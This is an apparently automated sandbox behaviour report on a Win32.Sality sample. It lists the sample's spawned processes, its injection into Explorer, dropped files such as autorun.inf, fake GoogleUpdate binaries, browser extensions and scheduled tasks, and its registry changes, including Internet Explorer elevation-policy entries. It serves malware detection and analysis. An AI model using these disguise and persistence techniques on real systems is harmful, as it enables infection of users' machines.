Win32.Sality.3_b3ed4f7939

Dynamic Analysis

Payload

Behaviour	Description
WormAutorun	A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

Process activity

The Trojan creates the following process(es):

GoogleUpdate.exe:2616
GoogleUpdate.exe:2788
GoogleUpdate.exe:2396
GoogleUpdate.exe:3060
GoogleUpdate.exe:2140
GoogleUpdate.exe:3724
GoogleUpdate.exe:2504
a4f7d362-83b9-4acf-812c-4634a66ba943-4.exe:2092
%original file name%.exe:312
a4f7d362-83b9-4acf-812c-4634a66ba943-11.exe:3964
Sense-codedownloader.exe:3400
Sense-codedownloader.exe:3032
a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe:2568
Tkbjndnqomlxl.exe:2840
regsvr32.exe:2328

The Trojan injects its code into the following process(es):

Explorer.EXE:1140

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process GoogleUpdate.exe:2788 makes changes in the file system.

The Trojan deletes the following file(s):

%Program Files%\globalUpdate\Update\Install (0 bytes)

The process GoogleUpdate.exe:3724 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MSIa82cb.LOG (474 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (940 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (936 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (673 bytes)
%Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (0 bytes)

The process %original file name%.exe:312 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\system.ini (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\WrapperUtils.dll (1856 bytes)
C:\autorun.inf (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0007F3B4_Rar\%original file name%.exe (75544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\Tkbjndnqomlxl.exe (4202874 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\winkumnvb.exe (561 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (332415 bytes)
%System%\drivers\ktonn.sys (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wduc.exe (561 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (272 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\orxds.exe (15019 bytes)
C:\totalcmd\TOTALCMD.EXE (1728 bytes)
C:\ljssj.pif (99 bytes)
%Program Files%\Common Files\Adobe\ARM\1.0\AdobeARM.exe (12 bytes)
%Program Files%\Adobe\Reader 9.0\Reader\Reader_sl.exe (840 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\Smpcpq.tmp (308806 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\wduc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\winkumnvb.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp (0 bytes)
%System%\drivers\ktonn.sys (0 bytes)
%WinDir%\7f172 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0007F3B4_Rar (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\orxds.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)

The process Tkbjndnqomlxl.exe:2840 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\Sense\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\37.js (2 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\InstallerUtils2.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\45.js (1 bytes)
%Program Files%\Sense\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\191.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\123.js (1 bytes)
%Program Files%\Sense\1293297481.mxaddon (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943.xpi (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\269.js (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\281.js (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\91.js (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\UserInfo.dll (4 bytes)
%Program Files%\Sense\Sense-codedownloader.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\7809 (1064979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\psmachine.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\263.js (1 bytes)
%Program Files%\Sense\Sense-bg.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdateHelper.msi (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\239.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\64.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\goopdate.dll (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\192.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\223.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins.json (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\InstallerUtils.dll (27704 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943-11.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\1.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\244.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%WinDir%\Tasks\temp_a4f7d362-83b9-4acf-812c-4634a66ba943-2.job (138 bytes)
%WinDir%\Tasks\a4f7d362-83b9-4acf-812c-4634a66ba943-1.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\125401 (279876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\38.js (2 bytes)
%Program Files%\Sense\042abe8f-d024-483d-b16f-b35d66d1d726.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\221.js (415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\102.js (1 bytes)
%WinDir%\Tasks\a4f7d362-83b9-4acf-812c-4634a66ba943-11.job (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\userCode\background.js (429 bytes)
%Program Files%\Sense\utils.exe (71614 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\220.js (784 bytes)
%WinDir%\Tasks\a4f7d362-83b9-4acf-812c-4634a66ba943-2.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\userCode\extension.js (613 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\246.js (7 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\4.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\180.js (1 bytes)
%Program Files%\Sense\a4f7d362-83b9-4acf-812c-4634a66ba943-4.exe (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.192588\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\226.js (510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\7.js (685 bytes)
%Program Files%\Sense\Sense-bho.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp (465960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\extensionData\plugins\262.js (1 bytes)

The Trojan deletes the following file(s):

%WinDir%\Tasks\temp_a4f7d362-83b9-4acf-812c-4634a66ba943-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\7809 (0 bytes)

Registry activity

The process GoogleUpdate.exe:2616 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E A2 E2 33 46 8A 98 29 30 6A 96 B6 21 4D 99 DE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"

The process GoogleUpdate.exe:2788 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 A9 5E 3B 82 B5 55 2D AE 50 E8 D7 71 1B C5 5B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{7377509D-1EA7-45AD-9827-4971A2B4A820}]
"pv" = "1.3.25.0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

The process GoogleUpdate.exe:2396 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F B0 6B 89 26 41 E7 4E A4 C0 AE BC B5 B5 6E 4C"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:3060 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 F4 08 EF ED 98 77 7F B8 B9 4A BC 21 15 66 F3"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:2140 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"ServiceParameters" = "/comsvc"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\globalUpdateUpdate.CoreClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreClass.1"

[HKCR\globalUpdateUpdate.CoreClass\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"

[HKCR\globalUpdateUpdate.Update3WebSvc.1.0]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3WebSvc]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3COMClassService.1.0]
"(Default)" = "Update3COMClass"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "Update3COMClass"

[HKCR\AppID\GoogleUpdate.exe]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc"

[HKCR\globalUpdateUpdate.CoreClass]
"(Default)" = "Google Update Core Class"

[HKCR\globalUpdateUpdate.Update3WebSvc\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"

[HKCR\globalUpdateUpdate.Update3COMClassService\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreClass"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "ServiceModule"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreClass.1"

[HKCR\globalUpdateUpdate.Update3COMClassService]
"(Default)" = "Update3COMClass"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\globalUpdateUpdate.Update3WebSvc.1.0\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"

[HKCR\globalUpdateUpdate.Update3COMClassService\CurVer]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"ServiceParameters" = "/comsvc"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"LocalService" = "globalUpdatem"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F D4 89 22 61 1E 5E 1F 67 FA 4C 9B C0 77 8F 51"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"

[HKCR\globalUpdateUpdate.CoreClass.1\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"

[HKCR\globalUpdateUpdate.CoreClass.1]
"(Default)" = "Google Update Core Class"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"LocalService" = "globalUpdate"

[HKCR\globalUpdateUpdate.Update3WebSvc\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "ServiceModule"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService"

[HKCR\globalUpdateUpdate.Update3COMClassService.1.0\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"(Default)" = "Google Update Core Class"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

The Trojan deletes the following registry key(s):

[HKCR\AppID\GoogleUpdate.exe]

The process GoogleUpdate.exe:3724 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Description" = "globalUpdate Update"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\ProgID]
"(Default)" = "globalUpdate.OneClickCtrl.10"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"

[HKCR\globalUpdate.Update3WebControl.4\CLSID]
"(Default)" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"ProductName" = "globalUpdate Update"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"(Default)" = "globalUpdate Update Plugin"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"Name" = "globalUpdate Update"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Version" = "4"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Version" = "10"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\globalUpdate\Update]
"GoogleUpdate.exe" = "globalUpdate Update"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"ProductName" = "globalUpdate Update"

[HKCR\globalUpdate.Update3WebControl.4]
"(Default)" = "globalUpdate Update Plugin"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppName" = "GoogleUpdate.exe"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"vendor" = "globalUpdate"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\MIME\Database\Content Type\application/x-vnd.google.update3webcontrol.4]
"CLSID" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppName" = "GoogleUpdateBroker.exe"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Description" = "globalUpdate Update"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"InstallTime" = "1411237389"

